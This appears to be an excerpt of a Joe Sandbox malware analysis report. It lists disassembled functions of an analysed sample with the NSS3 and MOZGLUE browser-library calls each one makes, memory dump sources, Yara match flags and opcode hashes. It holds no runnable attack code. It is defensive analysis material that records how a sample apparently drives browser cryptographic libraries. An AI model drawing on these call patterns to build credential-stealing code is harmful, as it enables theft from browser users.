                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                          • String ID: KRAM
                                                                                                                                                                                          • API String ID: 4127063985-3815160215
                                                                                                                                                                                          • Opcode ID: e65902870dad57e3d879afa6522cd5a9137cc557cd65320a8a34ef9f0afd407e
                                                                                                                                                                                          • Instruction ID: e8d5add14ff35a7bb4ad7083dadc43baadfd649f108b0c417e7002cc234475db
                                                                                                                                                                                          • Opcode Fuzzy Hash: e65902870dad57e3d879afa6522cd5a9137cc557cd65320a8a34ef9f0afd407e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 37216BB1A05A01DFD700AF39C884659BBF4BF55304F05C96AD889CB701EB35E889CBD2
                                                                                                                                                                                          Function 6C642C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C642CA0
                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C642CBE
                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000014), ref: 6C642CD1
                                                                                                                                                                                          • strdup.MOZGLUE(?), ref: 6C642CE1
                                                                                                                                                                                          • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C642D27
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Loaded library %s (static lib), xrefs: 6C642D22
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                          • String ID: Loaded library %s (static lib)
                                                                                                                                                                                          • API String ID: 3511436785-2186981405
                                                                                                                                                                                          • Opcode ID: 4d0a2e0dec19a07c47b72bca7143c8137fbc71f7a51102664ed700289ab947a3
                                                                                                                                                                                          • Instruction ID: 9a76c7c7563c3097e9f32249a55d3a98010e1e2fc4836543b9adce3dcc3be82c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d0a2e0dec19a07c47b72bca7143c8137fbc71f7a51102664ed700289ab947a3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5411B2B1A01241DFEB148F16DC88AA677B9AB8635DF24C12DD819C7B41E731D808CFA9
                                                                                                                                                                                          Function 0003FA24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Name::operator+$NameName::
                                                                                                                                                                                          • String ID: throw(
                                                                                                                                                                                          • API String ID: 168861036-3159766648
                                                                                                                                                                                          • Opcode ID: df9050e8ead80e01ebf6cb6bf2d9b6e51809adeec135b4f8e12a5bb78a0a9cb5
                                                                                                                                                                                          • Instruction ID: 89146907bf2e80cca7af435545d8a682c19b9bcd0384df1035d72a22d2d8ae65
                                                                                                                                                                                          • Opcode Fuzzy Hash: df9050e8ead80e01ebf6cb6bf2d9b6e51809adeec135b4f8e12a5bb78a0a9cb5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58018470A0020AAFDF15EBA4D852EFD7BB9EF44748F004065F905AB2D6DA74DA458780
                                                                                                                                                                                          Function 6C5D2E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5D3046
                                                                                                                                                                                            • Part of subcall function 6C5BEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5BEE85
                                                                                                                                                                                          • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C5A7FFB), ref: 6C5D312A
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5D3154
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5D2E8B
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                            • Part of subcall function 6C5BF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C5A9BFF,?,00000000,00000000), ref: 6C5BF134
                                                                                                                                                                                          • memcpy.VCRUNTIME140(8B3C75C0,?,6C5A7FFA), ref: 6C5D2EA4
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D317B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2334702667-0
                                                                                                                                                                                          • Opcode ID: f30e1983ed44285ea5831f71e9ebeab3192a3213848fcaa9de98e2d80ceb2a43
                                                                                                                                                                                          • Instruction ID: d2fbcc1863a60ff77e89a3ca888445ae3ad287a854d3b3da87d396e1ca7d255a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f30e1983ed44285ea5831f71e9ebeab3192a3213848fcaa9de98e2d80ceb2a43
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DA1DD71A003199FDB24CF58CC81BEAB7B5EF89308F058099E94967740E731AD85CF96
                                                                                                                                                                                          Function 6C59ED00 Relevance: 9.2, APIs: 6, Instructions: 228memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C59ED6B
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C59EDCE
                                                                                                                                                                                            • Part of subcall function 6C590BE0: malloc.MOZGLUE(6C588D2D,?,00000000,?), ref: 6C590BF8
                                                                                                                                                                                            • Part of subcall function 6C590BE0: TlsGetValue.KERNEL32(6C588D2D,?,00000000,?), ref: 6C590C15
                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,6C59B04F), ref: 6C59EE46
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C59EECA
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C59EEEA
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C59EEFB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3768380896-0
                                                                                                                                                                                          • Opcode ID: 32a39ac69bfd3195d44099bc8b6f436ce0d331d489f4cdfebd7c93fb2dc87401
                                                                                                                                                                                          • Instruction ID: c50ca467f4745bbac622fedb598d09bc26d7b6e4441303be16ad426b048c40fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 32a39ac69bfd3195d44099bc8b6f436ce0d331d489f4cdfebd7c93fb2dc87401
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5818BB5A002499FEB14CF59CC80BAB77F5BF89308F1444ACE8169B751DB71E818CBA1
                                                                                                                                                                                          Function 6C4714A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C4714C5
                                                                                                                                                                                          • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4714E2
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C471546
                                                                                                                                                                                          • InitializeConditionVariable.KERNEL32(?), ref: 6C4715BA
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4716B4
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1909280232-0
                                                                                                                                                                                          • Opcode ID: 5993ae83b7b63db47d8613487e4d333bd4b427d2452a7798e4f650754c6bcec2
                                                                                                                                                                                          • Instruction ID: c378fcfb7cd563583601dfd6bf365c7775c4c7b6ceaf24c872960e118b301ac2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5993ae83b7b63db47d8613487e4d333bd4b427d2452a7798e4f650754c6bcec2
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D61CB72A017509BDB21DF21C890FDABBB5BF89308F04851DE98A57701EB30E949CBA1
                                                                                                                                                                                          Function 6C59CCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C59C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C59DAE2,?), ref: 6C59C6C2
                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C59CD35
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DC6
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DD1
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5F9DED
                                                                                                                                                                                            • Part of subcall function 6C586C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C531C6F,00000000,00000004,?,?), ref: 6C586C3F
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C59CD54
                                                                                                                                                                                            • Part of subcall function 6C5F9BF0: TlsGetValue.KERNEL32(?,?,?,6C640A75), ref: 6C5F9C07
                                                                                                                                                                                            • Part of subcall function 6C587260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C531CCC,00000000,00000000,?,?), ref: 6C58729F
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C59CD9B
                                                                                                                                                                                          • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C59CE0B
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C59CE2C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C59CE40
                                                                                                                                                                                            • Part of subcall function 6C5914C0: TlsGetValue.KERNEL32 ref: 6C5914E0
                                                                                                                                                                                            • Part of subcall function 6C5914C0: EnterCriticalSection.KERNEL32 ref: 6C5914F5
                                                                                                                                                                                            • Part of subcall function 6C5914C0: PR_Unlock.NSS3 ref: 6C59150D
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: PORT_ArenaMark_Util.NSS3(?,6C59CD93,?), ref: 6C59CEEE
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C59CD93,?), ref: 6C59CEFC
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C59CD93,?), ref: 6C59CF0B
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C59CD93,?), ref: 6C59CF1D
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C59CD93,?), ref: 6C59CF47
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C59CD93,?), ref: 6C59CF67
                                                                                                                                                                                            • Part of subcall function 6C59CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C59CD93,?,?,?,?,?,?,?,?,?,?,?,6C59CD93,?), ref: 6C59CF78
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3748922049-0
                                                                                                                                                                                          • Opcode ID: d738e6fa8d924db1da1c65231c0f9dfbcba3dbf7dd0f5c8c1421ad3641672375
                                                                                                                                                                                          • Instruction ID: 0dade6c77cb1102ed84d414b747badaae7b22686f24a671931922b8e3d5e55a6
                                                                                                                                                                                          • Opcode Fuzzy Hash: d738e6fa8d924db1da1c65231c0f9dfbcba3dbf7dd0f5c8c1421ad3641672375
                                                                                                                                                                                          • Instruction Fuzzy Hash: A051D576A012509FEB11DF69DC40BAA73F4EF88348F2505A4D85697741EB31FD05CB91
                                                                                                                                                                                          Function 6C56EEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C56EF38
                                                                                                                                                                                            • Part of subcall function 6C559520: PK11_IsLoggedIn.NSS3(00000000,?,6C58379E,?,00000001,?), ref: 6C559542
                                                                                                                                                                                          • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C56EF53
                                                                                                                                                                                            • Part of subcall function 6C574C20: TlsGetValue.KERNEL32 ref: 6C574C4C
                                                                                                                                                                                            • Part of subcall function 6C574C20: EnterCriticalSection.KERNEL32(?), ref: 6C574C60
                                                                                                                                                                                            • Part of subcall function 6C574C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574CA1
                                                                                                                                                                                            • Part of subcall function 6C574C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C574CBE
                                                                                                                                                                                            • Part of subcall function 6C574C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C574CD2
                                                                                                                                                                                            • Part of subcall function 6C574C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C574D3A
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C56EF9E
                                                                                                                                                                                            • Part of subcall function 6C5F9BF0: TlsGetValue.KERNEL32(?,?,?,6C640A75), ref: 6C5F9C07
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C56EFC3
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C56F016
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C56F022
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2459274275-0
                                                                                                                                                                                          • Opcode ID: 4a02c4ef4c681a65badc9e005625dc88edff113788d6d4972feb44b58a64cef5
                                                                                                                                                                                          • Instruction ID: 1dfe42e0739c6d4a328cad4a04abd92a65cb71fa315eed33c6c73f881291f7c4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a02c4ef4c681a65badc9e005625dc88edff113788d6d4972feb44b58a64cef5
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF41C671E00109AFDF01CFA9DC85BEE7BB9AF48358F004125F915A7750E772D9158BA1
                                                                                                                                                                                          Function 00033259 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strtok_s
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3330995566-0
                                                                                                                                                                                          • Opcode ID: 68a937e953133242fdb83785977727a36eb0b5c1174083f51c4ca22b29e6bf83
                                                                                                                                                                                          • Instruction ID: cef06d9edb6286a989dbe07c669bc7be774224ffcc011278e2f9f6088d7ddf07
                                                                                                                                                                                          • Opcode Fuzzy Hash: 68a937e953133242fdb83785977727a36eb0b5c1174083f51c4ca22b29e6bf83
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE318171A05215AFDB658F68DCC5A6A7BECBF0871AF519059F805DB092EB34CB408B40
                                                                                                                                                                                          Function 6C542E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C532D1A), ref: 6C542E7E
                                                                                                                                                                                            • Part of subcall function 6C5907B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C538298,?,?,?,6C52FCE5,?), ref: 6C5907BF
                                                                                                                                                                                            • Part of subcall function 6C5907B0: PL_HashTableLookup.NSS3(?,?), ref: 6C5907E6
                                                                                                                                                                                            • Part of subcall function 6C5907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C59081B
                                                                                                                                                                                            • Part of subcall function 6C5907B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C590825
                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C542EDF
                                                                                                                                                                                          • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C542EE9
                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C532D1A), ref: 6C542F01
                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C532D1A), ref: 6C542F50
                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C542F81
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
